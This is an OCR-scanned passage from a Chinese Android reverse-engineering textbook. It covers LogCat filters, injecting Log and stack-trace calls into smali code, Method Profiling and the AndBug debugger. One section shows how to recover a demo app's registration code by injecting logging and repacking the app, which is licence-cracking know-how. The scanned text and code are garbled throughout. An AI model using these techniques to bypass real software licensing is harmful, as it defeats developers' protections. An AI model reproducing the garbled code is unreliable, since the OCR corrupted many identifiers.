恩 ，d 表 示 输 出 DEBUG 类 型 的 信息 ，i 表 示 输 出 INFO 类 型 的 信息 ，w 表 
示 输 出 WARN 类 型 的 信息 ，e 表 示 输 出 ERROR 类 型 的 信息 。 第 1 个 字符 
串 参 数 “com.droider.jnimethods” 为 调试 信息 的 Tag 标 记 ， 第 2 个 字符 串 参 
数 为 调试 信息 。 

DDMS 提 供 了 LogCat 窗 口 来 显示 android.util.Log 类 的 输出 信息 。 在 
使 用 LogCat 窗 口 查 看 调试 信息 前 ， 需 要 先 配 置 LogCat 消 恩 过 滤器 ， 点 击 
LogCat 窗 口 左边 的 绿色 加 号 按钮 ， 打 开 LogCat 消 息 过 滤器 设置 对 话 框 ， 
在 Filter Name 一 栏 中 输入 过 滤器 的 名 称 如 “jnimethods”。 过 滤器 可 以 根据 
Log 标 签 (Log Tag) 、Log 消 息 (Log Message) 、 进 程 ID (PID) 、 程 
序 名 (Application Name) 、Log 等 级 (Log Level) 来 设 定 要 过 滤 的 调试 
信息 。Log 标 签 为 Log 类 调试 信息 输出 方法 的 第 一 个 参数 ;Log 消息 为 具 
体 的 消息 内 容 ;，PID 为 程序 运行 时 的 进程 ID;， 程序 名 为 软件 的 包 名 ; 
Log 等 级 分 为 六 大 类 : verbose、debug、info、warn、error、assert。 其 中 
verbose 表 示 输 出 所 有 调试 信息 ， 包 括 VERBOSE、DEBUG、INFO、 
WARN、ERROR，ASSERT。debug 输 出 DEBUG、INFO、WARN.、 
ERROR 调 试 信息 。info 输 出 INFO、WARN、ERROR 调 试 信息 。warn 输 
出 WARN 和 ERROR 调 试 信息 。error 只 输出 ERROR 调 试 信息 。assert 输 出 
Assert 类 的 断言 信息 。 如 图 8-2 所 示 ， 本 实例 添加 了 一 个 Tag 标 签 
为 “com.droider.jnimethods” 的 消息 过 滤器 。 














Logcat Message Filter Settings 


Filter Logcat messages by the source’ s tag, pid or minimum 1og level. 


Empty fields will match all messages, 








Filter Name: jnimethods 





by Log Tage: Icom, droider. jnimethods 


by Log Nessage. 
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by Log Level: 
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图 8-2 ”设置 LogCat 消 息 过 


设置 好 LogCat 消 息 过 滤器 后 ， 


窗口 中 显示 出 来 。 
辕 ; Logfat 器 | 国 Console 


Saved Filters 只 = 





过 滤器 


运行 7.6.2 节 的 jnimethods 实 例 ， 如 图 
8-3 所 示 ， 所 有 标签 为 “com.droider.jnimethods” 的 Log 信 息 都 会 在 LogCat 
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ReleasestringUTFCharsi) --> sdk 

Cet0bjectFieldi) --> astrinygField:abc 
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图 8-3 ”使 用 LogCat 窗 口 查看 程序 运行 结果 











VY -ar 
注 轧 


除了 使 用 LogCat 外 ， 还 可 以 使 用 命令 行 





执行 “adb logcat -s com.droider.jnimethods:V”， 





行 方式 查看 Log 输 出 ， 有 具体 的 方法 是 在 命令 提示 符 下 


输出 的 结果 与 LogCat 窗 口 是 一 样 的 。 





8.3 ”定位 关键 代码 


人 
同 ， 这 里 主要 是 通过 运行 要 分 析 的 程序 ， 观 察 程序 的 输出 结果 来 判断 程 
序 的 关键 点 。 


8.3.1 ”代码 注入 法 一 一 让 程序 上 自己 吐出 注册 码 


通常 ， 一 个 程序 在 发 布 时 不 会 保留 Log 输 出 信息 ， 要 想 在 程序 的 特 
定位 置 输出 信息 还 需要 手动 的 进行 代码 注入 。 所 谓 的 代码 注入 是 指 首先 
反 编 译 Android 程 序 ， 然 后 在 反 汇 编 出 的 smali 文 件 中 添加 Log 调 用 的 代 
码 ， 最 后 重新 打包 程序 运行 来 查看 输出 结果 。 

本 小 节 实 例 为 一 个 注册 码 验 证 模拟 程序 ， 输 入 用 户 名 与 注册 码 后 点 
击 注册 按钮 ， 程 序 会 判断 注册 码 是 否 正确 ， 并 弹出 相应 的 提示 消息 ， 运 
行 实例 程序 ， 效 果 如 图 8-4 所 示 。 

















2 共 时 四 1:32 
注册 码 演示 程序 


admin 





图 8-4 ”注册 码 演示 程 序 
现在 我 们 的 需求 是 : 不 修改 程序 ， 找 出 用 户 名 admin 的 注册 码 。 
首先 看 看 它 的 反 汇 编 代 码 ， 使 用 Apktool 对 程序 进行 反 编译 ， 找 到 
按钮 点 击 事 件 处 理 代码 如 下 。 





.method public onClick (Landroid/view/View;)V 
.locals 6 
.parameter "vv" 
.prologue 
const/4 v5, Ox0 
.line 35 
iget-object v3, p0, Leom/droider/sn/MainActivity$1;->thiss$0:Lcom/ 
droider/sn/MainaActivity; 
invoke-static {v3}, Leom/droider/sn/MainActivity; 
->access$0 (Lcom/droider/sn/MainActivity;)Landroid/widget/EditText; 
move-result-object v3  ”# 用 户 名 文本 控件 
invoke-virtual {v3}, Landroid/widget/EditText;->getText()Landroid/text/ 
Editable; 
move-result-object v3 
invoke-interface {v3}, Landroid/text/Editable;->tostring()Ljava/lang/ 
String; 
move-result-object v3  ”# 获 取 用 户 名 文本 框 的 内 容 
invoke-virtual {v3}, Ljava/lang/Sstring;->trim()Ljava/lang/string; 
move-result-object v2  # 去 除 用 户 名 的 空格 
.line 36 
.local v2, strUserName:Ljava/lang/String; 
iget-object v3, p0, Lcom/droider/sn/MainActivity$1;->thiss$0:Lcom/droider/ 
sn/MainActivity; 
invoke-static {v3}, Leom/droider/sn/MainaActivity; 
->access$1l (Lcom/droider/sn/MainActivity;)Landroid/widget/EditText; 
move-result-object v3  # 注 册 码 控件 
invoke-virtual {v3}, Landroid/widget/EditText;->getText ()Landroid/text/ 
Editable; 
move-result-object v3 
invoke-interface {v3}, Landroid/text/Editable;->tostring()Ljava/lang/ 
string; 
move-result-object v3  ”# 绪 取 注 册 码 
invoke-virtual {v3}, Ljava/lang/String;->trim()Ljava/lang/string; 
move-result-object vl ，# 去 除 注 册 码 中 的 空格 
-11ine 37 
.local vl, strPassword:Ljava/lang/string; 
invoke-virtual {v2}, Ljava/lang/string;->length()I 
move-result v3  # 用 户 名 长 度 
if-eqz v3，:cond_0 # 用 户 名 不 能 为 空 
invoke-virtual {vl}, Ljava/lang/String;->length()I 


move-result v3  # 注 册 码 长 度 
if-nez v3, :cond 1 
.line 38 
:cond_0 # 提 示 用 户 名 与 注册 码 不 能 为 空 
iget-object v3, p0, Lecom/droider/sn/MainActivity$1;->thiss$0:Lcom/droider/ 
sn/MainActivity; 
const-string v4, "\u8bf7\u8f93\u5165\u7528\u6237\u540d\ud4e0e\u6ce8\u518c\ 
u7801" 
invoke-static {v3, v4, Vv5}, Landroid/widget/Toast; 
->makeText (Landroid/content/Context;Ljava/lang/CharSequence;I) 
Landroid/widget/Toast; 
move-result-object v3 
invoke-virtual {v3}, Landroid/widget/Toast;->show()V 
.line 47 
:goto_0 
return-void # 子 程序 返回 
.line 41 
“CONnd 1 
iget-object v3, p0, Leom/droider/sn/MainActivity$l1;->this$0:Lcom/droider/ 
sn/MainActivity; 
invoke-static {v3, Vv2}, Lcom/droider/sn/MainActivity; 
->access$2 (Lcom/droider/sn/MainActivity;Ljava/lang/String;)Ljava/lang/ 
String; 
move-result-object v0  # 根 据 用 户 名 计算 注册 码 
.line 42 
.local vO, realSN:Ljava/lang/string; 
invoke-virtual {vil, vO}, Ljava/lang/String;->equalsIgnoreCase(Ljava/ 
lang/String;)2Z 
move-result v3 
if-eqz v3, :cond 2 # 比 较 注 册 码 是 否 正确 
.line 43 
iget-object v3, p0, Lcom/droider/sn/MainaActivity$1;->this$0:Lcom/ 
droider/sn/MainActivity; 
const-string v4, "\u6ce8\u5l8c\u7801\u6b63\u786e" 
invoke-static {v3, v4, v5}, Landroid/widget/Toast; 
->makeText (Landroid/content/Context;Ljava/lang/CharSequence; 
I)Landroid/widget/Toast; 
move-result-object v3 
invoke-virtual {v3}，Landroid/widget/Toast;->show()V  ”# 弹 出 注册 码 正确 
goto :goto_0 


.line 45 

2eonQ_ 2 

iget-object v3, pO0, Lcom/droider/sn/MainActivity$1;->this$0:Lcom/ 

droider/sn/MainActivity; 

const-string v4, "\u6ce8\u51l8c\u7801\u9519\u8bef" 

invoke-static {v3, v4, v5}, Landroid/widget/Toast; 
->makeText (Landroid/content/Context;Ljava/lang/CharSequence; 
I)Landroid/widget/Toast; 

move-result-object v3 

invoke-virtual {v3}，Landroid/widget/Toast;->show()V  # 弹 出 注册 码 错误 

goto :goto_0 

.end method 


仔细 阅读 上 面 的 反 汇 编 代 码 ， 会 发 现 line 42 行 的 “if-eqz V3， 
:cond_2” 是 程序 的 关键 部 分 ， 通 过 比较 v1〈 输 入 的 注册 码 ) 与 vO0〈 计 算 
所 得 的 注册 码 ) 的 值 ， 来 判断 注册 码 是 否 正 确 ， 因 此 ， 此 处 要 想 获 取 真 
实 的 注册 码 只 需要 在 42 行 处 加 入 Log.v0 输 出 v0 寄 存 器 的 值 即 可 。 相 应 的 
反 汇 编 代 码 如 下 : 


const-string v3, "SN" 


invoke-static {v3, v0}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/ 
StrEling;) 


修改 完成 后 的 代码 如 图 8-5 所 示 。 


YE saali 二 再 oteDadF 
文件 下) 编辑 让 】 搜索 E) 视图 如 格式 如 语言 此) 设置 I) 宏和) 运行 人 插件 全) 窗口 他 ) 2 
= r by 区 、 [全 、 "py 


: [4 加 四 凡 司 顺和 朋 | 省 胃 胸 |B3C| 巾 二 | 鸣 | 加 | 古 | 王国 | 向 国 




















a MainActivity$1. smali | 


“line 42 

.local vO, realsSN:Lijava/ lang/String; 

const-string v3, "SHN" 

invoke-static {rv3, ro}, Landroid/util/Log;->v{(Liava/ lang/String;Lijava/ lang/String;})I 
invoke-virtual {rvi, vo}, Ljava/ lang/String;->equalsIgnoreCase(Ljava/ lang/String;})2Z 


move-result v3 


if-eqz v3, :cond 2 
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图 8-5 ”手工 注入 Log.v0 的 代码 


将 修改 完成 的 代码 使 用 Apktool 重 新 打包 ， 签 名 并 再 次 运行 该 程 
厅 。 输 入 用 户 名 “admin” 与 任意 的 注册 码 ， 此 时 仍然 会 弹出 注册 人 码 错误 





的 提示 ， 但 Log.v0 方 法 却 “ 偷 偷 地 ”输出 了 正确 的 注册 人 码 ， 在 命令 提示 符 
中 执行 “adb ”logcat ”-s SN:v” 输 出 信息 如 下 注册 码 为 用 户 名 的 MD5 


值 ) 。 
V/SN ( 414): 21232f297a57a5a743894a0e4a801fc3 


使 用 代码 注入 除了 可 以 精确 的 输出 程序 运行 时 的 中 间 结 果 ， 还 可 以 
作为 程序 分 析 时 的 “ 风 癌 标 ?。 例 如 在 分 析 过 长 的 方法 代码 时 ， 很 难 确定 
一 些 想 要 “关注 ?的 代码 是 否 被 调用 过 ， 这 时 就 可 以 在 这 些 代码 的 开头 注 
入 Log 输 出 的 代码 ， 程 序 运 行 时 通过 查看 是 否 有 Log 和 输出 来 判断 代码 是 
含 被 调用 过 


8.3.2” 栈 跟踪 法 





使 用 LogCat 配 合 代 但 注入 在 分 析 程 序 时 屡 试 不 奏 ， 但 需要 分 析 人 员 
阅读 大 量 的 反 汇 编 代 人 码 来 寻找 程序 的 “输出 ”点 ， 这 期 间 可 能 需要 多 次 手 
动 注 入 Log 输 出 代码 ， 如 果 分 析 大 型 程序 的 话 ， 这 很 显然 是 一 件 累 人 的 
苗 差 事 ， 这 种 情况 下 束 需 要 为 一 种 快速 定位 程序 关键 点 的 方法 。 

栈 跟踪 法 同样 属于 代码 注入 的 范畴 ， 它 主要 是 手动 向 反 汇 编 后 的 
smali 文 件 中 加 入 栈 跟踪 信息 输出 的 代码 。 与 注入 Log 输 出 的 代码 不 同 的 
是 ， 栈 跟踪 法 只 需要 知道 大 概 的 代码 注入 点 。 而 且 注 入 代码 后 的 反馈 信 
息 比 Log 注 入 要 详细 的 多 。 人 效果 如 图 8-6 所 示 ， 程 序 
运行 后 弹出 了 Toast， 现 在 我 们 的 需求 是 : 这 个 Toast 是 何 时 被 调用 的 ? 
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stackTrace 演 示 实 例 
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图 8-6 ”stackTrace 实 例 


将 staceTrace 程 序 使 用 Apktool 反 编译 ， 然 后 运用 第 5 章 介 绍 的 特征 函 
数 法 来 查找 Toast 的 调用 ， 最 终 发 现 如 下 代码 。 


.method Private c()V 

locals: 2 

.prologue 

.line 27 

const-string vO, "who called me?" 

const/4 vil, 0x0 

invoke-static {p0, v0O, vi}, Landroid/widget/Toast; 
->makeText (Landroid/content/Context;Ljava/lang/CharSequence; 
I)Landroid/widget/Toast; 

move-result-object v0 

invoke-virtual {v0}, Landroid/widget/Toast;->show()y 

.line 29 

return-void 


.end method 


Toast 是 由 上 面 line 27 行 处 的 代码 调用 的 ， 现 在 只 需要 在 它 的 下 面 也 





就 是 line ”29 行 处 加 入 输出 栈 跟踪 信息 的 代码 即 可 。 相 应 的 Java 代 码 如 


下 


new Exception("print trace") .printStackTrace!(); 

将 其 转换 成 smali 语 法 的 反 汇 编 代码 为 : 

new-instance v0, Ljava/lang/Exception; 

const-string vil, "print trace" 

invoke-direct {v0O, v1l}, Ljava/lang/Exception;-><init>(Ljava/lang/Sstring;)Vv 
invoke-virtual {v0}, Ljava/lang/Exception;->printSstackTrace()V 


修改 完成 后 的 代码 如 图 8-7 所 示 。 


阶 *T:VTeapvstackTracevsaalivcoavdroidervstackTraceYv 丰 ainkctivit7-s 了 ali 一 Hotepad++ 
文件 下 ) 编辑 正 ) 搜索 () 视图 WW 格式 中 语言 LL 设置 I) 宏 (@) 运行 信 ) 插件 下 ) 窗口 好) 2 
:88 国 图 曰 名 店 昌 | 上 而 区 | 翌 如 | 网 于 | 有 会 | 国 昌 | 到 和 | 下 | 国 | 国画 四 四国 | 必 光 
园 Wainhetivity. smali | 
39 日 .method private c(t}v 
40 locals 2 
41 prologue 
42 “line 27 
43 const-string vo, "who called me?" 
44 Const/j4 vi, Ox0 
45 invoke-static {rp0, voO, vi}, Landroid/widget/Toast;->makeText{Landroid/content/Context;Lijava/ lang/CharSequen 
46 
47 move-result-ohject vo 
48 
49 invoke-virtual {v0}, Landroid/widget/Toast;->show(}Yv 














50 new-instance vO, Liava/ lang/Exception; 
二 const-string vi, "print trace" 


invoke-direct {voO, vi}, Ljava/ lang/Exception;-><init>{(Lijava/ lang/String; }Y 
invoke-virtual {ro0}, Lijava/ lang/Exception;->printstackTrace()}Y 


"line 29 
return-voidqd 
"end method 
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图 8-7 手工 注入 栈 跟 踪 信 息 输 出 的 代码 


将 修改 完成 的 代码 使 用 Apktool 重 新 打包 ， 签 名 后 再 次 运行 程序 ， 
LogCat 和 窗口 便 会 输出 栈 跟 踪 信 息 。 栈 跟踪 信息 是 WARN 级 别 ， 而 且 Tag 
名 称 被 系统 命名 为 System.err， 因 此 在 命令 提示 符 下 输入 “adb logcat -s 
System.errV *:W” 也 会 输出 同样 的 栈 跟 踊 信息 ， 输 出 结果 如 下 。 








W/System.err( 1440): java.lang.Exception: print trace 

W/System.err( 1440) :at com.droider.stackTrace.MainActivity.c(MainActivity. 
java:27) 

W/System.err( 1440):at com.droider.stackTrace.MainActivity.b(MainActivity. 
java:23) 

W/System.err( 1440) :at com.droider.stackTrace.MainActivity.a(MainActivity. 
java:19) 

W/System.err( 1440): at com.droider.stackTrace.MainActivity.onCreate 
(MainActivity.java:15) 

W/System.err( 1440): at android.app.Instrumentation.callActivityOnCreate 
(Instrumentation.java:1047) 

W/System.err( 1440): at android.app.AMActivityThread.performLaunchActivity 
(ActivityThread.java:1611) 

W/System.err( 1440): at android.app.AMActivityThread.handleLaunchActivity 
(ActivityThread.java:1663) 

W/System.err( 1440): at android.app.ActivityThread.access$1500 (Activity- 
Thread.java:117) 

W/System.err!( 1440) :at android.app.ActivityThread$H.handleMessage (Activity- 
Thread .java:931) 

W/System.err( 1440) :at android.os.Handler.dispatchMessage (Handler .java:99) 
W/System.err( 1440):at android.os.Looper.1loop(Looper.java:123) 
W/System.err( 1440):at android.app.ActivityThread.main (ActivityThread. 
java:3683) 

W/System.err( 1440) :at java.lang.reflect.Method.invokeNative (Native Method) 
W/System.err( 1440):at java.lang.reflect.Method.invoke(Method.java:507) 
W/System.err( 1440):at com.android.internal .os. 
ZygoteInits$sMethodaAndArgsCaller.run(ZygotelInit.java:839) 

W/System.err( 1440):at 

com.android.internal.os.ZygoteInit .main(ZygoteInit.java:597) 
W/System.err( 1440):at dalvik.system.NativeStart.main(Native Method) 


栈 跟踪 信息 记录 了 程序 从 启动 到 printStackTrace0 被 执行 期 间 所 有 被 








调用 过 的 方法 。 从 下 往 上 查看 栈 跟 踪 信 息 ， 找 到 第 一 条 以 
com.droider.stackTrace 开 头 的 信息 ， 发 现 最 开始 调用 的 是 OnCreate0， 然 
后 依次 是 a0、b0、c0， 如 此 一 来 ， 函 数 的 执行 流程 就 一 清二 楚 了 。 


8.3.3 Method Profiling 


Windows 平 台 上 大 名 易 易 的 Ollydbg 调 试 器 有 一 个 trace 功 能 ， 它 的 作 











用 是 在 执行 程序 时 记录 下 每 个 被 调用 的 API 名 称 ， 分 析 人 员 只 需 查 看 
API 的 调用 序列 即 可 知道 这 段 代 码 的 具体 用 途 。 这 个 功能 十 分 强大 ， 
DDMS 中 也 提供 了 类 似 的 调试 方法 ， 它 就 是 Method ”Profiling 〈 方 法 剖 
析 ) 。 

本 小 节 的 演示 实例 模拟 了 多 级 方法 调用 ， 点 击 “MethodProfiling” 按 
钮 后 ， 程 序 会 执行 一 系列 的 方法 。 运 行 实例 程序 ， 效 果 如 图 8-8 所 示 。 
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图 8-8 ”Method Profiling 演 示 程 序 











在 DDMS 的 Devices 窗 口中 选择 com.droider.methodprofiling 程 序 ， 点 


击 Devices 劳 边 工 具 栏 上 的 “Start ”Method ”Profiling” 按 钮 开启 Method 
Profiling， 如 图 8-9 所 示 。 





四 Devices 2 迹 七 人 D 多 S| ron] 这 Sad 
i 
司 国 emul ator-5554 Dnline Android2.3.3 ... 

system_process ‘3 8600 
JP. co. omr onsoft. openwnn 151 8602 
com. android. systemul 161 8603 
com. android. phone 158 8604 
com. android. settines 207 8601 
com. android. launcher 224 8605 
android. process. acore 231 8606 
com. android. deskclock 252 8607 
ardrold. process. media 269 8608 
com. android. quicksearchbox 286 8609 
com. android. protips 296 8610 
com. android. music 309 8611 
com. android. mms 319 8612 
com. android. emall 342 8613 
com. android. defcontainer 8615 

com. svox. pico 8616 
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图 8-9 开启 Method Profiling 


此 时 “Start Method Profiling” 按 钮 的 提示 文字 会 变 成 “Stop Method 
Profiling”， 切 换 到 程序 的 运行 界面 点 击 ^MethodProfiling” 按 钮 ， 等 程序 
执行 完 Toast 后 点 击 “Stop Method Profiling” 停 止 Method Profiling， 稍 等 片 
刻 ， 会 自动 弹出 TraceView 窗 口 ， 如 图 8-10 所 示 。 





EDDES — C:\DOCUNE 1\ADEINI 1\LOCALS “1\Temp\ddas7509797589251924548. trace — Eclipse 
File 了 Edit Refactor Navigate Search Project BRun Window Help 
加 Ue Do + a 时 | 剖 Java | 图 Dms | 
号 ddms7509797589251924548, trace 53 fu 各 
msec: 49.64 max msec: 260 (cpu time) 





r E T T T ,对 T 
0 20 50 140 160 180 200 220 240 


[1] main 


加 本 小 0 


[8] Binder Thread 起 刚 


[7] Binder Thread #1 


[5] JDYP 


Jnel Cpu Ti... Incl Cpu Time Excl Cpu Ti 了 xcl Cpu Time CallstRecur,.. Cpu Time/Cal 全 
(toplevel) 100, 0% 251. 822 3.1% 7.747 8+0 31.41 
android/os/Handler. dispatchllessage (Landroid/os/Nessae 858.2% 222.067 0.3% 0.721 12+0 18.5C 
android/view/ViewRoot. handlellessage (Landroid/os/Nesss 56.0% 141.088 0.3% 0.855 8+0 17.65 
android/view/ViewRoot. performTraversals OY 44.6% 112.249 1 .2% 3.146 4+0 28. 0€ 
android/os/Handler. handleCallback (Landroid/os/Nessage 31. 9% 80. 258 0.1% 0.313 4+0 20. OE 
android/view/ViewRoot. draw (CZ)Y 21.2% 53.276 1.5% 3.681 3+0 17.7E 
android/view/View$PerformClick. ran OV 19. 9% 50.096 0.0% 0.050 1+0 S50, 0¢ 
android/view/View. performClick OZ 19. 9% 50.046 0.0% 0.111 i+0 50.0 
com/ droider/methodprofiline/MainActivity$1. onClick (Le 19.0% 47. 925 0.0% 0.052 1+0 47.92 
com/ droider/methodprofiline/MNainActivity. access$0 (Leo 19.0% 47.873 0.0% 0.051 1+0 47.87 
comy droider/methodprofiline/MainActivity. a OV 19.0% 47.822 0.0% 0.088 1+0 47.82 
com/ droider/methodprofiline/MainActivity.b OV 19. 0% 47.734 0.0% 0.043 1+0 47.7: 
com/ droider/methodprofiline/MainActivity. ce OV 18. 9% 47,691 0.0% D0.080 1+0 47.65 
android/widget/Toast, makeText (Landroid/content/Conte 17. 6% 44. 322 0.1% 0.242 1+0 44.32 
android/view/View, draw (Landroid/graphics/Canvas; )Y 18,7% 42.149 0.6% 1.457 3+5 S.2E 
android/view/LayoutInflater. inflate (TLandroid/view/Y 16. 1% 40.460 n 0.052 1+0 40. 站 
android/view/LayoutInflater. inflate (ILandroid/view/Y 16.0% 40. 408 0.158 1+0 40 4[ 
android/view/ViewGroup. dispatchDraw (Landroid/eraphic 15. 2% 38, 192 4.311 3+6 4.2¢ 
android/view/LayoutInflater inflate (Lorg/xmlpull/vl/ 14.9% 37.518 0.259 1+0 37.519 


> 


Android SIk Content Loader 





图 8-10 ”TraceView 窗 口 


TraceView 窗 口 Name 一 栏 中 显示 的 方法 调用 就 是 我 们 需要 关注 的 地 
方 ， 每 一 个 方法 调用 都 有 一 个 数字 编号 ， 和 
色 区 分 ， 点 击 方法 调用 左边 的 加 号 展开 任意 一 个 方法 调用 都 会 看 到 其 
有 Parents 与 Children 两 个 子 项 ， 其 中 Parents 表 示 该 方法 被 ee 
用 ，Children 表 示 该 方法 调用 了 哪些 方法 。 所 有 的 方法 调用 都 以 链表 的 
形式 依次 显示 ， 显 示 的 顺序 与 栈 跟 踪 的 输出 信息 恰恰 相反 。 

从 Name 列 表 的 第 8 个 方法 调用 OnClick0 开 始 ， 依 次 展开 它们 的 
Children， 最 后 可 以 看 到 点 击 “MethodProfiling” 按 钮 后 执行 的 所 有 方法 ， 
如 图 8-11 所 示 ， 显 示 效 果 比 栈 跟踪 信息 还 要 直观 


T android/view/View. performClick OZ 19. 9% 50.046 0 


BB 是: com/ droider/methodprofiline/ Mainhctivity$l. onClick (LandroidrviewyView;]Y 19.0% 47. 925 0 
币 Parent 
Children 
是 ::1 0.1% 0.052 
[| 9 com/droider/methodprofiline/MainActivity. access$0 (Leom/droider/methodprofiline/NainActivity; )Y 99. 9% 47.873 
| | 9 com/ droider/methodprofiline/Mainhctivity. access$0 (Leom/droider/methodprofiline/Nainhctivity:; )Y 19.0% 47.873 0. 
币 Parents 
Children 
self 0.1% 0.051 
10 com/droider/methodprofiline/NMainhctivity. a OV 99. 9% 47. 822 
10 com/droider/methodprofiline/NMainhctivity. a OV 19.0% 47. 822 0. 
Parents 
Children 
self 0.2% 0.088 
目 11 com/droider/methodprofiline/Mainhctivity.b OV 99.8% 47.734 
日 目 11 com/droider/methodprofiline/MainActivity.b OV 19.0% 47.734 0 
+ Parents 
Children 
转 =self 0. 1% 0.043 
12 comy droiderymethodprofilingyiainActivity. ce OV 99. 9% 47.691 
12 com/droider/methodprofiline/ Nainhctivity.c OV 18. 9% 47.6B91 0 
Parents 
Children 
self 0.2% 0.080 
国 13 android/widget/Toast. makeText (Landroid/content/Context;Ljava/lang/CharSequence:I)Landroid/widget, 92.9% 44. 322 
国 102 android/iwidget/Toast. show OY 6.9% 3.289 
有 目 13 android/widget/Toast. makeText (Landroid/content/Context;Lijava/lane/CharSequence;I)Landroid/wideget/Toast; 17.6% 44. 322 0 


图 8-11 ”使 用 TraceView 查 看 方法 调用 


如 果 我 们 想 要 执行 Method Profiling 的 代码 一 开始 就 执行 了 ， 例 如 上 
一 节 的 stackTrace 实 例 ， 要 想 对 它 使 用 Method ”Profiling 就 需要 查找 开始 
点 与 结束 点 ， 然 后 手动 注入 代码 。Method Profiling 本 和 丑 就 是 Android 
SDK 中 提供 的 调试 支持 ， 而 并 非 DDMS 所 特有 ， 在 android.os.Debug 类 
中 ， 提 供 了 startMethodTracing() 与 stopMethodTracing() 两 个 方法 来 开启 与 
关闭 Method Profiling。 例 如 下 面 的 代码 。 


androld.os .Debug.startMethodTracing("123") ; 








a 
android.os.Debug.stopMethodTracing!(); 


字符 串 “123” 为 trace 文 件 名 ， 上 面 的 代码 在 执行 后 会 在 SD 卡 的 根 目 
录 中 生成 123.trace 文 件 ， 这 个 文件 包含 了 a() 方 法 执行 过 程 中 所 有 的 方法 
调用 与 CPU 占 用 时 间 等 信息 ， 可 以 使 用 Android SDK 中 提供 的 traceview 
工具 来 打开 它 ， 该 工具 是 Android SDK 的 tools 目 录 下 的 一 个 脚本 文件 ， 
使 用 方法 是 先 执行 “adb pul/mnt/sdcard/123.trace” 导 出 123.trace 文 件 ， 然 
后 执行 “traceview 123.trace” 打 开 TraceView 窗 口 ， 显 示 效 果 与 在 DDMS 中 
直接 调用 是 一 样 的。 另外 ， 注 入 的 代码 在 运行 时 需要 往 SD 卡 中 写 入 文 
件 ， 因 此 还 需要 在 反 编 译 的 Android-Manifest,.xml 文 件 中 添加 SD 卡 写 入 











权限 ， 代 人 码 如 下 : 


<uses-permission android:name="android.permission.WRITE EXTERNAL STORAGE"/> 

如 果 手 动 注入 Method Profiling 代 码 的 起 始点 与 结束 点 不 好 确定 ， 我 
们 可 以 将 它 的 范围 设置 的 大 一 些 ， 如 在 Activity 的 OnCreate() 方 法 中 注入 
startMethodTracing() 的 代码 ， 反 汇编 代码 如 下 。 


const-string v0, "123" 
invoke-static {v0}, Landroid/os/Debug;->startMethodTracing (Ljava/lang/ 
String;)V 


然后 在 Activity 的 OnStop0 方 法 中 注入 stopMethodTracing0) 的 代码 ， 
反 汇 编 代码 如 下 。 
invoke-static {}, Landroid/os/Debug;->stopMethodTracing()V 


这 样 当 程 序 打开 并 关闭 后 就 会 生成 123.trace 文 件 ， 接 下 来 使 用 
traceview 工 具 来 手动 分 析 它 即 可 。 





8.4 使 用 AndBug 调 试 Android 程 序 


AndBug 是 一 款 开源 的 脚本 式 的 Android 程 序 动态 调试 器 。 使 用 
Python 语言 开发 ， 调 试 接口 与 Android SDK 中 提供 的 调试 插件 相同 ， 采 
用 JDWP 协 议 与 Dalvik 调 试 监视 器 (DDM) 挂 勾 Dalvik 虚 拟 机 的 方法 来 
获取 进程 状态 。 然 而 与 Android SDK 提 供 的 调试 插件 有 所 不 同 的 是 ， 使 
用 AndBug 调 试 Android 程 序 并 不 需要 事先 拥有 Android 程 序 源码 ， 因 此 ， 
对 于 Android 开 发 人 员 与 逆 回 分 析 人 员 来 说 ， 这 都 是 一 球 不 错 的 调试 工 
有 具 。 项 目 主 页 为 : https://github.com/swdunlop/AndBug。 














8.4.1 安装 AndBug 


目前 AndBug 只 支持 Linux 系 统 ， 安 装 步骤 如 下 : 

1. 安装 python-dev 和 python-pyrex 两 个 库 。 在 终端 提示 符 下 的 
行 “sudo apt-get install python-dev python-pyrex”。 

2. 安装 bottle 库 。 到 http://pypi.python.org/pypi/bottle 下 载 最 新 的 
bottle 库 源码 ， 解 压 后 在 终端 提示 符 下 执行 “sudo python setup.py 
install”。 

3. 下 载 AndBug 源 码 。 在 终端 提示 符 下 执行 “git clone 
https:/github.com/swdunlop/AndBug.git”。 

4. 编译 AndBug。 进 入 AndBug 目 录 ， 在 终端 提示 符 下 执行 make 命 
6 

5. 设置 环境 变量 。 在 ~/.bashrc 文 件 中 加 上 export 
PYTHONPATH=$PYTHONPATH: /lib， 完 成 后 重新 启动 终端 。 

以 上 安装 步骤 一 般 不 会 出 错 ， 顺 利安 闭 完 成 后 在 终端 提示 符 下 执 
行 ./andbug 会 显示 帮助 信息 。 








8.4.2 ”使 用 AndBug 


使 用 AndBug 调 试 Android 程 序 需 要 先 执行 被 调试 的 程序 ， 然 后 使 用 
AndBug 附 加 到 该 程序 进程 上 进行 调试 。 下 面 以 8.3.3 小 节 的 
MethodProfiling 实 例 进行 演示 。 首 先 运 行 MethodProfiling 程 序 ， 然 后 在 
终端 提示 符 下 执行 “adb shell ps” 列 出 所 有 的 进程 ， 输 出 如 下 。 


android@honeynet:~/tools/andbugs$ adb shell ps 


USER PID PPID VSIZE RSS WCHAN PC NAME 
root js 0 268 180 c009b74c 0000875c S /init 

root 2 0 0 0 c004e72c 00000000 S kthreadd 
root 3 2 0 0 c003fdc8 00000000 S ksoftirqd/0 
root 4 2 0 0 c004b2c4 00000000 S events/0 
root 3 芝 0 0 c004b2c4 00000000 Ss khelper 
root 6 2 0 0 c004b2c4 00000000 S suspend 


app_28 有 了 “2 85992 23060 ffffffff afdq0c51c S com.android.email 

app_3 YE 32 84972 20012 ffffffff afdOcSlc S com.android. defcontainer 
app_9 63 .32 82888 19428 ffffffff afdOc5lc S com.svox.pico 

app_34 396 32 87564 21520 ffffffff afd0c51c S com.droider.stackTrace 
app_35 433 32 92696 24796 ffffffff afdOc5lc S com.droider.methodprofiling 
root 461 40 732 328 c003da38 afd0c3ac S /system/bin/sh 

root 462 461 888 324 00000000 afd0b45c R ps 


从 输出 中 发 现 程序 的 进程 ID 为 433， 下 面 执行 “./andbug shell -p 
433” 来 附加 AndBug 调 试 器 。 成 功 的 话 会 进入 AndBug 的 Shell 环 境 ， 效 果 
如 图 8-12 所 示 。 


HO@O@ android@honeynet: ~/tools/andbug 


File Edit View Terminal Help 


379 84972 28689012 ffffffff afdoc51c com.android.defcontainer 
383 82888 19428 ffffffff afdgc51c 5 com.svox.pico 

396 87564 21520 ffffffff afdo9c51c com.droider.stackTrace 
433 92696 24796 ffffffff afdec51c com.droider.methodprofili 


467 732 328  c8963da38 afdec3ac S /system/bin/sh 
468 888 324 9060660006 afdeb45c ps 
android@honeynet:~/tools/andbug$ ./andbug shell -p 433 























